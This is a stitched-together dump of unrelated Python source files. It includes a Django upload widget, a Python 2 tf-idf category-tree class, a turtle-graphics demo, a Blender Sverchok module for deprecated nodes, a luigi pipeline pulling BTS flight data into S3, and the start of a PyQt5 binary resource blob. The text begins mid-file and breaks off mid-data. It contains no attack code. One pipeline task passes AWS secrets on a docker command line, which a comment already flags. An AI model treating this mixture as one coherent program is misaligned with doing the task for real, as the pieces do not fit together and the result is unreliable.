                # object that FileField will turn into a ValidationError.
                return FILE_INPUT_CONTRADICTION
            # False signals to clear any existing value, as opposed to just None
            return False
        return upload


class ImagePreviewWidgetHorizontal(ImagePreviewWidget):
    """ImagePreviewWidget rendered with the horizontal preview template."""

    template_name = 'admin/attachment/widgets/preview_image_input_horizontal.html'


class ImagePreviewWidgetVertical(ImagePreviewWidget):
    """ImagePreviewWidget rendered with the vertical preview template."""

    template_name = 'admin/attachment/widgets/preview_image_input_vertical.html'


class FileWidget(ClearableFileInput):
    """Clearable file input that slugifies the names of uploaded files
    before returning the value for this field."""

    def value_from_datadict(self, data, files, name):
        # Normalise every uploaded file name: keep the extension, swap
        # punctuation for '-', transliterate to ASCII and slugify the stem.
        for key, uploaded in files.items():
            original = uploaded._get_name()
            if '.' in original:
                ext = u"." + original.rpartition('.')[2]
            else:
                ext = u""
            stem = original.rpartition('.')[0]
            stem = re.sub(r'[_.,:;@#$%^&?*|()\[\]]', '-', stem)
            files[key]._set_name(slugify(unidecode(smart_text(stem))) + ext)

        return files.get(name, None)

import json

from collections import (
    Counter,
    defaultdict as deft
)

from copy import deepcopy as cp

# from cPickle import (
#     dump as to_pickle,
#     load as from_pickle
# )

from StringIO import StringIO

from TfIdfMatrix import TfIdfMatrix

from Tools import from_csv


class CategoryTree:
    """Propagates concept tf-idf weights up a category hierarchy.

    Loads three CSV inputs (terms, categories, and term->category
    assignments) plus a TfIdfMatrix, then accumulates a term-weight
    vector per category by pulling each category's ancestors up to
    ``max_depth`` levels and projecting weights onto them.

    NOTE: written for Python 2 (print statements).
    """
    
    def __init__(self, categories_by_concept, terms,
                 categories, tfidf, max_depth=5, min_df=20
    ):
        # Minimum document frequency a term needs to contribute weight.
        self.min_df = min_df
        # Paths to the three input CSV files.
        self.path_categories_by_concept = categories_by_concept
        self.path_categories = categories
        self.path_terms = terms
        # Maximum number of hierarchy levels climbed per category.
        self.max_depth = max_depth
        # True for every category id and name seen in the category CSV.
        self.observed_category = deft(bool)
        # Bidirectional category-name <-> id maps.
        self.id_by_concept = dict([])
        self.concept_by_id = dict([])
        # True for terms (and their ids) whose name starts with 'Category:'.
        self.term_is_category = deft(bool)
        # Parent category ids, keyed by category id / concept term id.
        self.parents_by_category = dict([])
        self.parents_by_concept = deft(list)
        # Bidirectional term <-> id maps.
        self.id_by_term = dict([])
        self.term_by_id = dict([])
        self.has_parents = deft(bool)
        self.tfidf = tfidf
        # Categories visited during the current __call__ (cycle guard).
        self.pulling = set([])
        # Accumulated term-weight Counter per category id.
        self.vector_by_category = deft(Counter)
        # Term ids that contributed weight to each category id.
        self.contributors_by_category = deft(set)
        # Number of projections each category id has received.
        self.projected = Counter()

    def build(self):
        # Pull every known category once; print progress every 100 items.
        for i, c in enumerate(self.concept_by_id.values()):
            self(c)
            if not i % 100:
                t = float(len(self.concept_by_id.keys()))
                print i, int(t), round(i / t, 2)
#             if i >= 5000:
#                 break
    
    def dump(self):

        # Write one record per projected category to vector.dump.txt.
        out = open('vector.dump.txt', 'wb')

        for i, (_id, projections) in enumerate(self.projected.items()):
        
            if not i % 100:
                print i, len(self.projected.keys())

            if not projections:
                continue

            # Keep only features whose weight survives rounding to 4 places.
            features = [
                (self.tfidf.word_by_id[wid], round(weight, 4))
                for wid, weight in self.vector_by_category[_id].most_common()
                if round(weight, 4)
            ]
            record = (
                _id,
                self.concept_by_id[_id],
                features
            ) 
            out.write('%s\n' % str(record))

        out.close()


    def __call__(self, category):
        # Pull one category's ancestry tree; reset the cycle guard first.
        self.pulling = set([])
        return self.__pull(None, 0, category, dict([]))

    def __get_parents(self, _id):
        # Return the observed parent names of category _id, minus any
        # category already being pulled (prevents cycles).
        parents = []
        name = self.concept_by_id[_id]
        if (
            not self.observed_category[name] or
            not self.observed_category[_id] or
            not self.has_parents[_id]
        ):
            return []
        else:
            for i in self.parents_by_category[_id]:
                if not self.observed_category[i]:
                    continue
                _name = self.concept_by_id[i]
                parents.append(_name)
            return set(parents) - self.pulling


    def __pull(self, vector, depth, category, tree):
        # Recursively build the ancestor tree of `category`, projecting
        # `vector` (the root category's weights) onto every node visited.
        _id = self.id_by_concept[category]
        if not self.pulling:
            # First call of this traversal: use the root category's vector.
#             print
#             print
#             print category, _id
#             print [self.term_by_id[x] for x in self.contributors_by_category[_id]]
#             print self.vector_by_category[_id].most_common(20)
            vector = self.vector_by_category[_id]

        if not self.observed_category[category]:
            return dict([])

        parents = self.__get_parents(_id)
        if not parents or depth >= self.max_depth:
            # Leaf of the traversal: no parents, or depth limit reached.
            tree[category] = dict([])
        else:
            subtree = dict([])
            self.pulling.update(parents)
            for parent in parents:
                subtree = self.__pull(vector, depth + 1, parent, subtree)
            tree[category] = subtree

        self.__project(vector, tree)

        return tree

    
    def __project(self, vector, tree):
        # Add `vector` to every category in `tree` (recursively) and count
        # the projection in self.projected.
        if not tree.keys():
            return
        else:
            for key, subtree in tree.items():
                _id = self.id_by_concept[key]
                self.projected[_id] += 1
                self.__add2vec(vector, _id)
                self.__project(vector, subtree)

    def __add2vec(self, vector, _id):
        # Accumulate every (term-id, weight) pair of `vector` into the
        # target category's vector.
#         for w, weight in vector.items():
#             __id = self.tfidf.id_by_word[w]
        for __id, weight in vector.items():
            self.vector_by_category[_id][__id] += weight

    def load(self):
        # Terms must be loaded before assignments; categories before both
        # observed_category checks in __load_assignments.
        self.__load_terms()
        self.__load_categories()
        self.__load_assignments()

    def __load_categories(self):
        # CSV rows: (concept name, category id).
        for concept, _id in from_csv(self.path_categories):
            _id = int(_id)
            self.id_by_concept[concept] = _id
            self.concept_by_id[_id] = concept
            self.observed_category[_id] = True
            self.observed_category[concept] = True
#             print concept, _id, len(self.id_by_concept.keys())
#         exit()
    
    def __load_terms(self):
        # CSV rows: (term, term id).  Terms named 'Category:...' are flagged.
        for term, _id in from_csv(self.path_terms):
            _id = int(_id)
            self.term_by_id[_id] = term
            self.id_by_term[term] = _id
            if not term.startswith('Category:'):
                continue
            self.term_is_category[term] = True
            self.term_is_category[_id] = True

    def __load_assignments(self):
        # CSV rows: (term id, parent category id, parent category id, ...).
        for row in from_csv(self.path_categories_by_concept):
            ints = [int(field) for field in row]
            term_id = ints[0]
            term = self.term_by_id[term_id]
            if self.term_is_category[term_id] and \
            self.observed_category[term]:
                # A category row: record its observed parents.
                term = self.term_by_id[term_id]
                cat_id = self.id_by_concept[term]
                assignments = [i for i in ints[1:] if self.observed_category[i]]
                self.parents_by_category[cat_id] = assignments
                self.has_parents[cat_id] = True
            else:
                # A plain concept: spread its tf-idf weights over its
                # parent categories, skipping low-df terms.
                vector = self.tfidf.content(term_id)
                assignments = [i for i in ints[1:] if self.observed_category[i]]
                self.parents_by_concept[term_id] = assignments
                for a_id in assignments:
                    for w, weight in vector:
                        if self.tfidf.df[w] < self.min_df:
                            continue
                        #print term, term_id, self.concept_by_id[a_id], w, self.vector_by_category[a_id][w], '\t+%f' % weight
                        self.vector_by_category[a_id][w] += weight
                        self.contributors_by_category[a_id].update([term_id])



if __name__ == '__main__':
    
    import random
    from random import shuffle as randomize
    
    
    # Load the tf-idf matrix produced by a previous run from the backup dir.
    tfidf = TfIdfMatrix()
    tfidf.load_features('bkp.big.out/vector.term.csv')
    tfidf.load_distribution('bkp.big.out/vector.index.csv')
#     tfidf.load_features('vector.term.csv')
#     tfidf.load_distribution('vector.index.csv')

    # Build the category tree, climbing at most one hierarchy level
    # per category (max_depth=1).
    ctree = CategoryTree(
        'bkp.big.out/category.index.csv',
        'bkp.big.out/term.csv',
        'bkp.big.out/category.csv',
#         'category.index.csv',
#         'term.csv',
#         'category.csv',
        tfidf,
        max_depth=1
    )
    ctree.load()
    ctree.build()
    ctree.dump()
    

"""
File: foursquares.py

Draws squares in the corners of a turtle window.
One square is black, another is gray, and the
remaining two are in random colors.
"""

from turtlegraphics import Turtle
import random

def drawSquare(turtle, x, y, length):
    """Draw a square whose top-left corner is at (x, y).

    Lifts the pen, moves to (x, y), points the turtle down the screen
    (heading 270), lowers the pen, and traces four sides of the given
    length, turning 90 degrees after each side.
    """
    turtle.up()
    turtle.move(x, y)
    turtle.setDirection(270)
    turtle.down()
    # range() instead of Python-2-only xrange(); iteration is identical.
    for count in range(4):
        turtle.move(length)
        turtle.turn(90)

def main():
    """Draw four squares, one in each corner of the turtle window.

    The upper-left square is black, the lower-left gray, and the two
    right-hand squares use random colors.
    """
    turtle = Turtle()
    length = 40  # side of each square
    # Half-extents of the window: distances from the origin to the edges.
    width = turtle.getWidth() / 2
    height = turtle.getHeight() / 2
    # (color, corner) pairs; a color of None means "pick one at random".
    squares = [
        ((0, 0, 0), (-width, height)),                  # black, upper left
        ((127, 127, 127), (-width, length - height)),   # gray, lower left
        (None, (width - length, height)),               # random, upper right
        (None, (width - length, length - height)),      # random, lower right
    ]
    for color, (x, y) in squares:
        if color is None:
            turtle.setColor(random.randint(0, 255),
                            random.randint(0, 255),
                            random.randint(0, 255))
        else:
            turtle.setColor(*color)
        drawSquare(turtle, x, y, length)
   
# Run the drawing immediately (no __main__ guard in the original script).
main()

# ##### BEGIN GPL LICENSE BLOCK #####
#
#  This program is free software; you can redistribute it and/or
#  modify it under the terms of the GNU General Public License
#  as published by the Free Software Foundation; either version 2
#  of the License, or (at your option) any later version.
#
#  This program is distributed in the hope that it will be useful,
#  but WITHOUT ANY WARRANTY; without even the implied warranty of
#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#  GNU General Public License for more details.
#
#  You should have received a copy of the GNU General Public License
#  along with this program; if not, write to the Free Software Foundation,
#  Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####

# Maps deprecated node bl_idnames to the module name (relative to this
# package) that still implements them.  Commented-out entries are retired.
old_bl_idnames = {
     'CentersPolsNode' : "centers",
#    'BakeryNode' : "bakery",
    'CircleNode' : "circle",
    'ListItemNode' : "list_item",
    'GenRangeNode' : "range",
    'GenSeriesNode' : "series",
#    'Test1Node' : "test",
#    'Test2Node' : "test",
#    'ToolsNode' : "tools",
    'SvReRouteNode': "reroute",
    'VoronoiNode': "voronoi",
    'ViewerNode': "viewer",
    'EvalKnievalNode': "eval_knieval",
    'FormulaNode': 'formula',
}

# we should add some functions to load things there
import importlib
import inspect
import traceback

import bpy

from sverchok.node_tree import SverchCustomTreeNode
# Maps bl_idname -> imported module for every old node registered so far.
imported_mods = {}

def is_old(node_info):
    """Return True if *node_info* refers to a deprecated node.

    Accepts either a bl_idname string or a bpy node instance; anything
    else yields False.
    """
    if isinstance(node_info, str):
        # Treat a bare string as a bl_idname.
        return node_info in old_bl_idnames
    if isinstance(node_info, bpy.types.Node):
        return node_info.bl_idname in old_bl_idnames
    return False

def scan_for_old(ng):
    """Frame every deprecated node found in the node group *ng*."""
    for node in (n for n in ng.nodes if n.bl_idname in old_bl_idnames):
        mark_old(node)
    
def mark_old(node):
    """Wrap *node* in a red warning frame, unless it already has one."""
    if node.parent and node.parent.label == "Deprecated node!":
        return
    tree = node.id_data
    warning_frame = tree.nodes.new("NodeFrame")
    # Keep the node inside its existing frame, if any.
    if node.parent:
        warning_frame.parent = node.parent
    node.parent = warning_frame
    warning_frame.label = "Deprecated node!"
    warning_frame.use_custom_color = True
    warning_frame.color = (.8, 0, 0)
    warning_frame.shrink = True

def reload_old(ng=False):
    """Reload the modules backing deprecated nodes in *ng*.

    With no (or a falsy) argument, recurses over every node group in
    the current blend file.
    """
    if not ng:
        for group in bpy.data.node_groups:
            reload_old(group)
        return
    deprecated_ids = {n.bl_idname for n in ng.nodes if n.bl_idname in old_bl_idnames}
    for bl_id in deprecated_ids:
        mod = register_old(bl_id)
        if mod:
            importlib.reload(mod)
        else:
            print("Couldn't reload {}".format(bl_id))
    
def load_old(ng):
    """Register old node classes until every node in *ng* resolves.

    Tries each known deprecated bl_idname in turn: if the group uses it,
    the backing module is registered and the nodes are framed as
    deprecated; otherwise the registration is undone.  Stops early once
    no unregistered node types remain.

    (An earlier approach intersecting ng's bl_idnames with
    old_bl_idnames did not work: undefined nodes don't report the
    expected bl_idname.)
    """
    not_reged_nodes = list(n for n in ng.nodes if not n.is_registered_node_type())
    if not not_reged_nodes:
        return
    for bl_id in old_bl_idnames:
        register_old(bl_id)
        nodes = [n for n in ng.nodes if n.bl_idname == bl_id]
        if nodes:
            for node in nodes:
                mark_old(node)
            not_reged_nodes = list(n for n in ng.nodes if not n.is_registered_node_type())
            node_count = len(not_reged_nodes)
            # typo fix: "unregisted" -> "unregistered"
            print("Loaded {}. {} nodes are left unregistered.".format(bl_id, node_count))
            if node_count == 0:
                return
        else:
            # Registering this type resolved nothing; undo it.
            unregister_old(bl_id)
    
def register_old(bl_id):
    """Import and register the module providing the old node *bl_id*.

    Returns the module on success; prints a message and returns None
    when *bl_id* is unknown, the module lacks a matching Node class, or
    it was already registered.
    """
    if bl_id in old_bl_idnames:
        mod = importlib.import_module(".{}".format(old_bl_idnames[bl_id]), __name__)
        for member_name, member in inspect.getmembers(mod):
            if not inspect.isclass(member):
                continue
            if issubclass(member, bpy.types.Node) and member.bl_idname == bl_id:
                if bl_id not in imported_mods:
                    try:
                        mod.register()
                    except:
                        traceback.print_exc()
                    imported_mods[bl_id] = mod
                    return mod
    print("Cannot find {} among old nodes".format(bl_id))
    return None

def unregister_old(bl_id):
    """Unregister and forget the loaded module for *bl_id*, if any."""
    global imported_mods
    mod = imported_mods.get(bl_id)
    if mod is None:
        return
    mod.unregister()
    del imported_mods[bl_id]
         
def unregister():
    """Unregister every loaded old-node module and reset the registry."""
    global imported_mods
    print(imported_mods)
    for module in imported_mods.values():
        module.unregister()
    imported_mods = {}

# coding: utf-8
"""
rita Pipeline 

.. module:: rita

   :synopsis: rita pipeline

.. moduleauthor:: Adolfo De Unánue <nanounanue@gmail.com>
"""

import os

import subprocess

from pathlib import Path

import boto3
import zipfile
import io

import csv
import datetime

import luigi
import luigi.s3

import pandas as pd

import sqlalchemy

from contextlib import closing

import requests

import re

from bs4 import BeautifulSoup

## Environment variables (loaded from the nearest .env file)
from dotenv import load_dotenv, find_dotenv
load_dotenv(find_dotenv())

## AWS credentials, read from the environment
AWS_ACCESS_KEY_ID =  os.environ.get('AWS_ACCESS_KEY_ID')
AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')

## Logging (importing rita.config_ini configures it)
import rita.config_ini

import logging

logger = logging.getLogger("rita.pipeline")


import rita.pipelines.utils

import rita.pipelines.common
from rita.pipelines.common.tasks import DockerTask

class ritaPipeline(luigi.WrapperTask):
    """
    Entry-point task for the pipeline: pulls in the catalog and data
    download subtrees.
    """

    def requires(self):
        yield DownloadRITACatalogs()
        yield DownloadRITAData()


class DownloadRITACatalogs(luigi.WrapperTask):
    """Spawns one DownloadCatalog task per lookup table linked from the
    BTS on-time performance download page.
    """

    def requires(self):
        baseurl = "https://www.transtats.bts.gov"
        url = "https://www.transtats.bts.gov/DL_SelectFields.asp?Table_ID=236"
        # Scrape the listing page for every "Download_Lookup" link.
        listing = requests.get(url)
        soup = BeautifulSoup(listing.content, "lxml")
        for link in soup.find_all('a', href=re.compile('Download_Lookup')):
            href = link.get('href')
            name = href.split('=L_')[-1]
            yield DownloadCatalog(catalog_name=name,
                                  catalog_url='{}/{}'.format(baseurl, href))

class DownloadCatalog(luigi.Task):
    """Downloads one BTS lookup catalog and stores it as CSV on S3."""

    catalog_url = luigi.Parameter()
    catalog_name = luigi.Parameter()

    root_path =  luigi.Parameter()

    def run(self):
        logger.debug("Guardando en {} el catálogo {}".format(self.output().path, self.catalog_name))

        # Stream the download line by line straight into the target;
        # closing() guarantees the HTTP connection is released.
        with closing(requests.get(self.catalog_url, stream= True)) as response, \
             self.output().open('w') as output_file:
            for chunk in response.iter_lines(chunk_size=1024*8):
                if chunk:
                    output_file.write(chunk.decode('utf-8') + '\n')


    def output(self):
        # <root_path>/catalogs/<catalog_name>.csv on S3
        output_path = '{}/catalogs/{}.csv'.format(self.root_path,
                                                  self.catalog_name)
        return luigi.s3.S3Target(path=output_path)


class DownloadRITAData(luigi.WrapperTask):
    """Downloads RITA data month by month, from ``start_year`` up to the
    most recent month available (today minus 90 days, to allow for the
    publication lag).
    """
    start_year = luigi.IntParameter()

    def requires(self):
        today = datetime.date.today() + datetime.timedelta(days=-90)

        max_year = today.year
        max_month = today.month

        # Bug fix: include max_year itself.  The original range() stopped
        # one year short, which also made the "año != max_year" branch
        # below unreachable.
        years = range(self.start_year, max_year + 1)

        logger.info("Descargando datos de los años {}".format(years))

        for año in years:
            if año != max_year:
                months = range(1, 13)
            else:
                # Bug fix: this was assigned to "month", which would have
                # left "months" unbound (NameError) for the current year.
                months = range(1, max_month + 1)
            for mes in months:
                yield DownloadRITAMonthlyData(year=año, month=mes)


class DownloadRITAMonthlyData(DockerTask):
    """Downloads one month of RITA data by running the
    ``rita/download-rita`` docker image, which writes the zip to S3.
    """
    year = luigi.IntParameter()
    month = luigi.IntParameter()

    root_path = luigi.Parameter()
    raw_path = luigi.Parameter()

    @property
    def cmd(self):
        # NOTE(review): the AWS credentials are interpolated into the
        # command line, so they can leak into process listings and logs.
        return '''
               docker run --rm --env AWS_ACCESS_KEY_ID={} --env AWS_SECRET_ACCESS_KEY={} rita/download-rita --year {} --month {} --data_path {}/{} 
        '''.format(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, self.year, self.month, self.root_path, self.raw_path)

    def output(self):
        # <root_path>/<raw_path>/MM-YYYY.zip on S3
        return luigi.s3.S3Target(path='{}/{}/{}-{}.zip'.format(self.root_path,
                                                               self.raw_path,
                                                               str(self.month).zfill(2),
                                                               self.year))



class ExtractColumns(luigi.Task):
    """Extracts the YEAR..DIV_AIRPORT_LANDINGS column range from one
    monthly RITA zip on S3 and stores it as a pipe-separated file.
    """

    task_name = "extract-columns"

    year = luigi.IntParameter()
    month = luigi.IntParameter()

    root_path = luigi.Parameter()
    bucket = luigi.Parameter()
    etl_path = luigi.Parameter()

    def requires(self):
        # NOTE(review): DownloadRITA is not defined in this part of the
        # file — possibly DownloadRITAMonthlyData was meant; confirm.
        return DownloadRITA(year=self.year, month=self.month)

    def run(self):

        s3 = boto3.resource('s3')

        bucket = s3.Bucket(self.bucket)

        input_path = Path(self.input().path)

        # Strip the 's3://<bucket>/' prefix to obtain the object key.
        obj = bucket.Object(str(input_path.relative_to('s3://{}'.format(self.bucket))))

        df = None

        # Read the whole zip into memory and parse each member as CSV.
        # If the archive holds several members, only the last one is kept.
        with io.BytesIO(obj.get()["Body"].read()) as input_file:
            input_file.seek(0)
            with zipfile.ZipFile(input_file, mode='r') as zip_file:
                for subfile in zip_file.namelist():
                    with zip_file.open(subfile) as file:
                        df = pd.read_csv(file)

        with self.output().open('w') as output_file:
            # Label-based column slice: YEAR through DIV_AIRPORT_LANDINGS.
            output_file.write(df.loc[:, 'YEAR':'DIV_AIRPORT_LANDINGS'].to_csv(None,
                                                                              sep="|",
                                                                              header=True,
                                                                              index=False,
                                                                              encoding="utf-8",
                                                                              quoting=csv.QUOTE_ALL))

    def output(self):
        # <root>/<etl>/extract-columns/YEAR=<year>/<MM>.psv on S3
        return luigi.s3.S3Target('{}/{}/{}/YEAR={}/{}.psv'.format(self.root_path,
                                                                  self.etl_path,
                                                                  self.task_name,
                                                                  self.year,
                                                                  str(self.month).zfill(2)))


class RTask(luigi.Task):
    """Smoke-test task: runs the ``rita/test-r`` docker image against the
    shared ``rita_store`` volume.
    """

    root_path = luigi.Parameter()

    def requires(self):
        # NOTE(review): RawData is not defined in this part of the file —
        # confirm it exists elsewhere in the module.
        return RawData()

    def run(self):
        cmd = '''
              docker run --rm -v rita_store:/rita/data  rita/test-r 
        '''

        logger.debug(cmd)

        # check_output raises CalledProcessError on a non-zero exit status.
        out = subprocess.check_output(cmd, shell=True)

        logger.debug(out)

    def output(self):
        return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_R.psv"))


class PythonTask(luigi.Task):
    """Smoke-test task: runs the ``rita/test-python`` docker image on the
    output of RTask, via the shared ``rita_store`` volume.
    """

    def requires(self):
        return RTask()

    def run(self):
        # Map the host-side input/output paths to their in-container
        # locations under /rita/data.
        container_input = os.path.join("/rita/data", os.path.basename(self.input().path))
        container_output = os.path.join("/rita/data", os.path.basename(self.output().path))
        cmd = '''
              docker run --rm -v rita_store:/rita/data  rita/test-python --inputfile {} --outputfile {}
        '''.format(container_input, container_output)

        logger.debug(cmd)
        out = subprocess.call(cmd, shell=True)
        logger.debug(out)

    def output(self):
        return luigi.LocalTarget(os.path.join(os.getcwd(), "data", "hola_mundo_desde_python.json"))





# -*- coding: utf-8 -*-

# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.9.2)
#
# WARNING! All changes made in this file will be lost!

from PyQt5 import QtCore

qt_resource_data = b"\
\x00\x00\x07\x27\
\x00\
\x00\x1a\x8b\x78\x9c\xe5\x58\xdd\x8f\xdb\x36\x12\x7f\xdf\xbf\x82\
\x55\x1f\xd2\x43\x2d\x8a\xa4\x3e\x28\x69\xed\x2d\xd0\xa4\x69\xf2\
\x50\xa0\x68\xd2\x14\xb8\x37\xad\x44\xdb\xba\xe8\xc3\x90\xe4\xb5\
\x9d\xbf\xfe\x86\xd4\x07\x29\xdb\x1b\x5f\x0e\xc5\x3d\xdc\x0a\xbb\
\x58\x71\x38\xc3\x99\xe1\x0c\x7f\x3f\x6a\x97\x3f\x1d\xcb\x02\x3d\
\x89\xa6\xcd\xeb\x6a\x65\x51\x4c\x2c\x24\xaa\xb4\xce\xf2\x6a\xb3\
\xb2\xfe\xfc\xf8\xd6\x0e\x2d\xd4\x76\x49\x95\x25\x45\x5d\x89\x95\
\x55\xd5\xd6\x4f\x0f\x77\xcb\xef\x6c\x1b\xbd\x6e\x44\xd2\x89\x0c\
\x1d\xf2\x6e\x8b\xde\x57\x9f\xdb\x34\xd9\x09\xf4\xc3\xb6\xeb\x76\
\xb1\xe3\x1c\x0e\x07\x9c\x0f\x42\x5c\x37\x1b\xe7\x1f\xc8\xb6\x1f\
\xee\xee\x96\xed\xd3\xe6\x0e\x21\x04\x7e\xab\x36\xce\xd2\x95\x35\
\x18\xec\xf6\x4d\xa1\x14\xb3\xd4\x11\x85\x28\x45\xd5\xb5\x0e\xc5\
\xd4\xb1\xb4\x7a\xaa\xd5\x53\xe9\x3d\x7f\x12\x69\x5d\x96\x75\xd5\
\x2a\xcb\xaa\xfd\xde\x50\x6e\xb2\xf5\xa4\x2d\xa3\x39\xb8\x4a\x89\
\x46\x51\xe4\x10\xe6\x30\x66\x83\x86\xdd\x9e\xaa\x2e\x39\xda\x73\
\x53\x88\xf1\x9a\x29\x23\x84\x38\x30\xa7\x35\xff\x33\xad\xb8\x85\
\x0d\xdd\xc1\xef\xa4\x3e\x0a\x70\x5b\xef\x9b\x54\xac\xc1\x4e\xe0\
\x4a\x74\xce\x9b\x8f\x6f\xa6\x49\x9b\xe0\xac\xcb\x8c\x65\xc6\xfd\
\x9c\x79\x9d\x6d\x72\x95\x94\xa2\xdd\x25\xa9\x68\x9d\x51\xae\xec\
\x0f\x79\xd6\x6d\xa1\xbe\xc1\xee\xa8\xc6\x5b\x91\x6f\xb6\x9d\x21\
\x78\xca\xc5\xe1\xe7\xfa\xb8\xb2\x08\x22\x88\x06\xf0\xd3\x8b\x75\
\x67\x50\x25\xc8\xb3\x95\xf5\xe1\xd3\xaf\x7f\xd4\x75\xd7\x8f\x07\
\x2f\xf1\xa4\x49\x70\xc4\x30\x45\x8d\x9a\x1e\x53\x89\xb3\x3a\x95\
\xb1\xad\xac\x4c\xf4\xdd\x85\xc7\x1d\x9a\x56\x10\xc7\x5d\xdd\x74\
\xf6\x3a\x2f\x44\xaf\xea\x6c\xeb\x52\x38\xff\xaa\x85\xf3\xeb\xfb\
\x8f\xce\xbe\xd9\x3a\x59\xd2\x25\x4e\x9e\x42\xbd\x1d\x73\x1d\xbc\
\xab\xae\xaf\x75\xcc\x76\xb0\xe7\x91\x87\xc3\x10\xaa\x1e\x5d\xd5\
\x39\x9d\xe9\x3c\x80\xd2\x72\x8a\x5b\x46\x92\xc9\xcd\x91\xa6\x7d\
\xfa\x8f\x49\xdb\x6f\x2a\x42\xbb\x64\x03\x61\x14\x75\xb3\xb2\xbe\
\x5f\xab\x67\x98\x78\xac\x9b\x4c\x34\xe3\x54\xa0\x9e\xd9\x54\x0d\
\x45\xca\xbb\x53\x7f\xe4\x86\xb5\xc7\xc0\xe4\xaa\xd3\x3c\xb9\x3e\
\xdf\x6e\x93\xac\x3e\xac\x2c\x76\x3e\xf9\xa5\xae\x4b\x59\xd7\x73\
\x79\x0a\xb5\x65\x38\xf4\x5c\xee\x5f\x4c\x81\x1b\x06\x7e\x02\x76\
\x31\x05\x65\xdb\xcb\x93\x68\xef\xab\xbc\x83\x6e\x1f\xba\xc5\x34\
\xde\x37\x8d\x54\x28\x92\x93\x80\x5c\xd5\x9f\x31\xa8\x76\x5b\x1f\
\x36\x8d\xdc\xb3\x75\x52\x4c\x9b\x36\x99\x1e\xf2\x0a\x72\xb0\xc7\
\xde\x8c\xd8\x45\xa6\x83\xc6\xd4\xad\xd4\xa3\xcf\xa8\xc8\xce\x7d\
\x66\xea\xf4\xfc\x54\x99\x1c\xf3\x32\xff\x22\x20\xc2\x8b\x85\x65\
\xe0\xf6\xe3\xa3\x3c\x13\x5d\xb3\x17\x66\x4a\xfb\x3c\x13\xed\x98\
\x14\x72\x54\xc7\x64\x62\xdd\xea\x1e\x91\x23\xd7\x1d\xe7\x4a\xd1\
\x25\xb2\x75\xf5\xfc\x28\x71\x03\xd5\x6f\xa0\x03\x58\x14\xff\xf1\
\xe6\x6d\x3f\x82\x71\x9a\xc6\x7f\xd5\xcd\xe7\x61\x08\x8f\x54\x48\
\x1e\xeb\x3d\xec\x83\xf5\x30\x89\x97\x59\x1a\x03\x7a\x94\x49\xf7\
\x90\x97\xd0\x17\x12\x78\x7e\x04\xb4\x58\x3a\x7a\x62\xa6\xdc\x9d\
\x76\x42\x2f\xda\x2f\xdb\x88\x1e\x86\xae\x62\x71\x96\x96\xb9\x34\
\x72\x3e\x74\x79\x51\xbc\x97\x4e\x86\xbc\x8c\x45\xf3\xae\x10\x5a\
\xb8\x74\x86\xe8\x87\xdc\x1c\x23\xb9\xa5\x33\xe6\xae\x46\x1b\xbd\
\x27\xaa\x75\xae\x94\xa1\xde\xef\xca\x3a\x13\x83\xc2\xf9\x7c\x91\
\x3c\x8a\x62\x65\xfd\xf2\x28\x2a\x81\xe8\xb4\x9b\x22\xed\xc6\x08\
\xe5\xda\x72\xcc\xc7\xb6\x34\xe0\x10\xd3\x70\x3a\x0f\x1a\x15\x01\
\xbf\x98\x96\x1a\xad\x85\x10\x34\x13\x9f\x06\x6d\x77\x2a\x20\xae\
\xb6\x6b\xea\xcf\xa2\xef\xe3\x98\x60\x9f\x7b\xbe\x47\xf8\x54\x7d\
\x67\x33\xcb\xf4\x56\x62\xd9\xd9\x21\xba\x9e\x29\x1b\x33\xdd\x8c\
\xc1\x24\x4d\x9e\xd8\x83\x0e\x25\xf4\x3c\xc8\x75\x0d\x87\x54\xbd\
\xc7\x95\x6c\x8b\xe2\x5e\x49\x9e\xa4\x59\xd5\xcd\x64\x07\xb5\x0d\
\x71\x40\xc8\xfd\x60\xd5\x88\x2e\xdd\xce\x74\x5a\x38\x35\x71\xb8\
\x3b\xde\x17\x79\x25\x86\x03\x1a\x53\xcc\xfc\x7e\x7a\x9d\x94\x79\
\x71\x8a\x5f\x7d\x50\x7d\x85\x5e\x43\x9a\xe8\xf7\xa6\x7e\x75\x6f\
\x8f\xe9\xd8\xfd\x32\x3b\x91\xe6\xeb\x3c\x05\x2a\xaf\xab\x0b\x75\
\xf4\x41\x94\xb9\xfd\x73\x5d\x64\xaf\xee\x0b\xd1\x75\xa2\xb1\x25\
\xb9\x01\xea\xc7\x04\x5c\x1f\x00\x49\x67\x02\xa0\x8e\x22\x1e\x80\
\x58\x0d\xec\x01\x46\x63\x7a\xdf\x17\x09\x72\xa8\x84\x65\x76\x46\
\x27\x8e\x9d\x4f\xa7\x13\xb5\xdc\x25\xdd\x56\x9f\x0f\x50\xf8\x0d\
\x11\xec\xba\x9e\x0b\x0f\x5d\x04\x58\x02\x28\x7a\x87\x3c\x1c\x04\
\x1e\xd0\x45\x88\x3e\x21\x1f\x53\x2f\x92\x42\x17\xbb\x91\x0f\x48\
\xef\x83\x10\xfa\x80\x11\x1a\x04\x21\x87\x09\x86\x19\x8d\x24\x07\
\xa0\xd7\x88\x62\xee\x33\xc9\x34\x0b\x82\x43\xa2\x54\x80\x6e\x31\
\x0b\x03\xe9\x02\x84\x51\x10\x4a\xa1\x2f\x97\xe0\x81\xd4\xe4\x0b\
\x60\x89\x28\x0c\x5d\x57\xae\xcc\x30\x09\x95\x06\x2c\x0c\x8b\x45\
\x44\xda\x99\x61\xe8\x78\xd1\x3f\x2d\x9d\xcb\x7f\xdd\x08\xd1\xcd\
\x46\x88\xb0\xab\x1e\xc2\x64\x15\xfe\xc6\x06\x78\x27\x92\xa7\xd3\
\xab\xa9\xb0\x70\xb3\x22\x46\x46\xb2\x7e\xb2\x5e\x70\xde\x98\x81\
\x49\x97\x35\x2c\x51\x88\x09\xa3\xae\xef\x46\x50\x42\x5f\x6e\x53\
\x0a\x7b\xe7\x46\x44\x16\x65\x41\x60\x4f\xfb\x04\xe8\xc2\x86\xad\
\xe6\xea\xdd\x14\xba\x72\xff\x55\x01\xc9\xc2\x86\x02\x30\x1f\xe4\
